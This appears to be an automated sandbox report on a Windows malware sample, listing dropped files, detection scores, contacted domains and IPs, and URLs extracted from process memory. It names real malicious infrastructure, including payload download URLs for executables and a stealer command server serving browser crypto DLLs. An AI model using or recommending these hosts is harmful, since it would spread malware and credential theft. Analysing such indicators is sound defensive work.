C:\Users\user\AppData\Local\Temp\u5mc.2\UIxMarketPlugin.dll	18%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\u5mc.2\relay.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\u5mc.3.exe	4%	ReversingLabs
C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll	18%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\SecureClient\relay.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
note.padd.cn.com	1%	Virustotal	Browse
fp2e7a.wpc.phicdn.net	0%	Virustotal	Browse
download.iolo.net	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.indyproject.org/	0%	URL Reputation	safe
https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alerts	0%	URL Reputation	safe
https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666B	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
http://185.172.128.228/BroomSetup.exe	0%	Avira URL Cloud	safe
http://185.172.128.76/3cd2b41cbde8fc9c.php	0%	Avira URL Cloud	safe
185.172.128.76/3cd2b41cbde8fc9c.php	0%	Avira URL Cloud	safe
http://185.172.128.90/cpa/ping.php?substr=one&s=ab&sub=0	100%	Avira URL Cloud	malware
http://91.215.85.66:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08	100%	Avira URL Cloud	malware
http://185.172.128.76/15f649199f40275b/sqlite3.dll	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/msvcp140.dll1L	0%	Avira URL Cloud	safe
http://185.172.128.90/cpa/ping.php?substr=one&s=ab&sub=0	21%	Virustotal		Browse
http://185.172.128.76/3cd2b41cbde8fc9c.php8a7e6c3bfacd86a45ba1b49cd72a6releasef14ebdac6029838f7530c1	0%	Avira URL Cloud	safe
http://185.172.128.228/BroomSetup.exe	23%	Virustotal		Browse
http://91.215.85.66:	0%	Avira URL Cloud	safe
185.172.128.76/3cd2b41cbde8fc9c.php	15%	Virustotal		Browse
http://185.172.128.76/15f649199f40275b/sqlite3.dll	9%	Virustotal		Browse
http://185.172.128.76/3cd2b41cbde8fc9c.php	15%	Virustotal		Browse
http://185.172.128.76/15f649199f40275b/nss3.dllx	0%	Avira URL Cloud	safe
http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefense	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/softokn3.dll	0%	Avira URL Cloud	safe
http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts	0%	Avira URL Cloud	safe
http://185.172.128.59/syncUpd.exe	100%	Avira URL Cloud	malware
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.6-	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/nss3.dllx	9%	Virustotal		Browse
http://185.172.128.76	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/nss3.dllb	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/softokn3.dll	0%	Virustotal		Browse
http://185.172.128.76/15f649199f40275b/nss3.dll	0%	Avira URL Cloud	safe
http://185.172.128.59/syncUpd.exe	23%	Virustotal		Browse
http://185.172.128.76/15f649199f40275b/nss3.dllb	3%	Virustotal		Browse
http://185.172.128.228/ping.php?substr=one	100%	Avira URL Cloud	malware
http://185.172.128.76/15f649199f40275b/mozglue.dll	0%	Avira URL Cloud	safe
http://185.172.128.228/ping.php?substr=one	18%	Virustotal		Browse
http://185.172.128.203/tiktok.exe00	0%	Avira URL Cloud	safe
http://185.172.128.203/tiktok.exe	100%	Avira URL Cloud	malware
http://185.172.128.76	11%	Virustotal		Browse
http://185.172.128.76/3cd2b41cbde8fc9c.phpk	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/msvcp140.dll	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/nss3.dll	0%	Virustotal		Browse
http://185.172.128.203/tiktok.exe	20%	Virustotal		Browse
http://note.padd.cn.com/1/Package.zip	0%	Avira URL Cloud	safe
http://185.172.128.203/tiktok.exe00	15%	Virustotal		Browse
http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefense	0%	Virustotal		Browse
http://91.215.85.66:9000	100%	Avira URL Cloud	malware
http://185.172.128.76/15f649199f40275b/msvcp140.dll	0%	Virustotal		Browse
http://note.padd.cn.com/1/Package.zip	3%	Virustotal		Browse
http://185.172.128.76/15f649199f40275b/mozglue.dll	0%	Virustotal		Browse
http://185.172.128.76/3cd2b41cbde8fc9c.phpk	8%	Virustotal		Browse
http://91.215.85.66:9000	10%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
iolo0.b-cdn.net	195.181.163.195	true	false		high
note.padd.cn.com	176.97.76.106	true	false	1%, Virustotal, Browse	unknown
svc.iolo.com	20.157.87.45	true	false		high
fp2e7a.wpc.phicdn.net	192.229.211.108	true	false	0%, Virustotal, Browse	unknown
download.iolo.net	unknown	unknown	true	0%, Virustotal, Browse	unknown
westus2-2.in.applicationinsights.azure.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://91.215.85.66:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08	true	Avira URL Cloud: malware	unknown
http://185.172.128.228/BroomSetup.exe	false	23%, Virustotal, Browse Avira URL Cloud: safe	unknown
185.172.128.76/3cd2b41cbde8fc9c.php	true	15%, Virustotal, Browse Avira URL Cloud: safe	low
http://185.172.128.76/3cd2b41cbde8fc9c.php	true	15%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.172.128.90/cpa/ping.php?substr=one&s=ab&sub=0	true	21%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.172.128.76/15f649199f40275b/sqlite3.dll	true	9%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.172.128.76/15f649199f40275b/softokn3.dll	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.172.128.59/syncUpd.exe	false	23%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.172.128.76/15f649199f40275b/nss3.dll	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.172.128.228/ping.php?substr=one	false	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.172.128.76/15f649199f40275b/mozglue.dll	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.172.128.203/tiktok.exe	false	20%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.172.128.76/15f649199f40275b/msvcp140.dll	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://svc.iolo.com/__svc/sbv/DownloadManager.ashx	false		high
http://note.padd.cn.com/1/Package.zip	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	u5mc.0.exe, 00000001.00000002.2129887694.00000000042D4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	u5mc.0.exe, 00000001.00000002.2129887694.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.000000000302F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://monitor.azure.com//.default	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	false		high
http://www.vmware.com/0	run.exe, 00000002.00000002.1852865451.0000000003F89000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082385125.00000000051F6000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	false		high
https://snapshot.monitor.azure.com/&	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2958500599.0000019524C80000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	false		high
http://svc.iolo.com/__svc/sbv/DownloadManager.ashx.	u5mc.3.exe, 00000005.00000003.2115855252.0000000002416000.00000004.00001000.00020000.00000000.sdmp, u5mc.3.exe, 00000005.00000003.2115855252.00000000024B4000.00000004.00001000.00020000.00000000.sdmp, u5mc.3.exe, 00000005.00000003.2115855252.0000000002479000.00000004.00001000.00020000.00000000.sdmp	false		high
https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinad	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951C06D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.iolo.com/company/legal/sales-policy/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BCA1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.indyproject.org/	QPoX60yhZt.exe, 00000000.00000003.1816995670.0000000007206000.00000004.00000020.00020000.00000000.sdmp, u5mc.3.exe, 00000005.00000000.1816333516.000000000041C000.00000020.00000001.01000000.0000000C.sdmp, u5mc.3.exe, 00000005.00000003.2115855252.0000000002472000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.iolo.com/support/solutions/articles/44001781185?	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2959550582.0000019524DE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	false		high
https://www.iolo.com/company/legal/privacy/?	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2959550582.0000019524DE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	false		high
http://www.codeplex.com/CompositeWPF	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	false		high
https://support.iolo.com/support/solutions/articles/44001781185	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950C023000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BCA1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://scripts.sil.org/OFL	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2897049550.000001950A3B5000.00000004.00000020.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2979971028.0000019529292000.00000004.00000800.00020000.00000000.sdmp	false		high
https://taskscheduler.codeplex.com/H	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	false		high
https://www.iolo.com/company/legal/sales-policy/?	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2959550582.0000019524DE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	false		high
https://scripts.sil.org/OFLX8	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2979971028.0000019529292000.00000004.00000800.00020000.00000000.sdmp	false		high
https://westus2-2.in.applicationinsights.azure.com	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BED9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alerts	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BCA1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	MSBuild.exe, 0000000D.00000002.2895391729.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BED9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://indiantypefoundry.com	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2979971028.0000019529292000.00000004.00000800.00020000.00000000.sdmp	false		high
https://download.avira.com/download/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BCA1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.172.128.76/15f649199f40275b/msvcp140.dll1L	u5mc.0.exe, 00000001.00000002.2129887694.00000000042D4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.codeplex.com/prism#Microsoft.Practices.Prism.ViewModel	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2956758607.0000019524BD0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	false		high
http://dejavu.sourceforge.net	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951549054.00000195248D0000.00000004.08000000.00040000.00000000.sdmp	false		high
http://www.mozilla.com/en-US/blocklist/	u5mc.0.exe, u5mc.0.exe, 00000001.00000002.2187775846.000000006BA8D000.00000002.00000001.01000000.0000000F.sdmp	false		high
https://www.iolo.com/company/legal/privacy/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BCA1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.172.128.76/3cd2b41cbde8fc9c.php8a7e6c3bfacd86a45ba1b49cd72a6releasef14ebdac6029838f7530c1	u5mc.0.exe, 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmp	false	Avira URL Cloud: safe	unknown
http://91.215.85.66:	MSBuild.exe, 0000000D.00000002.2895391729.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.172.128.76/15f649199f40275b/nss3.dllx	u5mc.0.exe, 00000001.00000002.2129887694.00000000042A5000.00000004.00000020.00020000.00000000.sdmp	false	9%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefense	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BCA1000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	u5mc.0.exe, 00000001.00000002.2129887694.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.000000000302F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://rt.services.visualstudio.com/l	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2958500599.0000019524C80000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	u5mc.0.exe, 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmp, u5mc.0.exe, 00000001.00000003.1743378692.00000000245BD000.00000004.00000020.00020000.00000000.sdmp	false		high
http://gdlp01.c-wss.com/rmds/ic/universalinstaller/common/checkconnection	run.exe, run.exe, 00000002.00000002.1851199040.00000000002EC000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000002.00000000.1781422592.00000000002EC000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000014.00000000.2132304102.00000000002EC000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000014.00000002.2222284891.00000000002EC000.00000002.00000001.01000000.00000009.sdmp	false		high
https://dc.services.visualstudio.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BED9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	u5mc.0.exe, 00000001.00000002.2129887694.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.000000000302F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.0000000003066000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.symauth.com/cps0(	run.exe, 00000002.00000002.1852865451.0000000003F89000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082385125.00000000051F6000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	u5mc.0.exe, 00000001.00000003.1846905045.000000002A91C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951549054.00000195248D0000.00000004.08000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666B	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BCA1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://dc.services.visualstudio.com/f	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2958500599.0000019524C80000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	false		high
https://profiler.monitor.azure.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BED9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.symauth.com/rpa00	run.exe, 00000002.00000002.1852865451.0000000003F89000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082385125.00000000051F6000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.newtonsoft.com/jsonschema	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	false		high
http://www.info-zip.org/	run.exe, 00000002.00000002.1852865451.0000000003F33000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082385125.00000000051AD000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2224438521.000000000393F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.6-	u5mc.3.exe, 00000005.00000003.2115855252.0000000002434000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://westus2-2.in.applicationinsights.azure.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BED9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.iolo.com/company/legal/eula/?	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2959550582.0000019524DE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	false		high
http://185.172.128.76	u5mc.0.exe, 00000001.00000002.2129827121.0000000004264000.00000040.00000020.00020000.00000000.sdmp	true	11%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://dejavu.sourceforge.net/wiki/index.php/License	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951549054.00000195248D0000.00000004.08000000.00040000.00000000.sdmp	false		high
http://185.172.128.76/15f649199f40275b/nss3.dllb	u5mc.0.exe, 00000001.00000002.2129887694.00000000042A5000.00000004.00000020.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://scripts.sil.org/OFLThis	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951C06D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	u5mc.0.exe, 00000001.00000003.1846905045.000000002A91C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/itfoundry/Poppins)&&&&z	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2959550582.0000019524DE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	false		high
https://github.com/itfoundry/Poppins)	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	false		high
https://snapshot.monitor.azure.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BED9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/itfoundry/Poppins)&&&&v	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2959550582.0000019524DE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	false		high
http://ocsp.sectigo.com0	QPoX60yhZt.exe, 00000000.00000003.1816995670.00000000075F2000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.iolo.com/company/legal/eula/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950C0F5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.newtonsoft.com/json	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2954807445.0000019524B20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	false		high
https://westus2-2.in.applicationinsights.azure.com/v2/track	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BED9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	u5mc.0.exe, 00000001.00000002.2129887694.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.000000000302F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.0000000003066000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtabS	MSBuild.exe, 0000000D.00000002.2895391729.000000000302F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	u5mc.0.exe, 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmp, u5mc.0.exe, 00000001.00000003.1743378692.00000000245BD000.00000004.00000020.00020000.00000000.sdmp	false		high
http://google.com	QPoX60yhZt.exe, 00000000.00000003.1816995670.0000000007206000.00000004.00000020.00020000.00000000.sdmp, u5mc.3.exe, 00000005.00000000.1816333516.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	false		high
https://dc.services.visualstudio.com/v2/track	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BED9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.172.128.203/tiktok.exe00	u5mc.0.exe, 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmp	false	15%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.codeplex.com/prism	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	false		high
https://taskscheduler.codeplex.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	false		high
https://westus2-2.in.applicationinsights.azure.com/;LiveEndpoint=https://westus2.livediagnostics.mon	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BCA1000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BED9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://compositewpf.codeplex.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	u5mc.0.exe, 00000001.00000002.2129887694.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.000000000302F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.0000000003066000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.172.128.76/3cd2b41cbde8fc9c.phpk	u5mc.0.exe, 00000001.00000002.2129887694.000000000427A000.00000004.00000020.00020000.00000000.sdmp	false	8%, Virustotal, Browse Avira URL Cloud: safe	unknown
